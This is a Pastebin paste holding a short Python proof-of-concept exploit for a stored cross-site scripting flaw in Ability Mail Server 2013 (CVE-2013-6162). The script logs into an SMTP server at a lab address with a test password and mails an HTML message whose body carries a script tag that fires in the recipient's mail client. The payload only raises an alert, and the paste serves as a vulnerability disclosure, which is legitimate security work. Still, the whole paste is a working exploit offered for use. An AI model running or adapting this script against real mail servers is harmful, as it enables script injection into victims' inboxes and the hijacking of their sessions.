API tools faq
paste
Advertisement
AndrewHaxalot

Ability Mail Server 2013 Stored XSS

AndrewHaxalot
Dec 18th, 2013
106
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.80 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. '''
  4. Exploit Title: Ability Mail Server 2013 Stored XSS
  5. Date: 12/20/2013
  6. Exploit Author: David Um
  7. Vendor Homepage: http://www.code-crafters.com/
  8. Software Link: http://download.code-crafters.com/ams.exe
  9. Version: 3.1.1
  10. Tested on: Windows Server 2003 SP2
  11. CVE : CVE-2013-6162
  12. Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
  13. '''
  14.  
  15. import smtplib
  16.  
  17. email_addr = 'user@hack.local'
  18.  
  19. email = 'From: %s\n' % email_addr
  20. email += 'To: %s\n' % email_addr
  21. email += 'Subject: XSS\n'
  22. email += 'Content-type: text/html\n\n'
  23. email += '<script>alert("XSS")</script>'
  24. s = smtplib.SMTP('192.168.58.140', 25)
  25.  
  26. s.login(email_addr, "user")
  27. s.sendmail(email_addr, email_addr, email)
  28. s.quit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!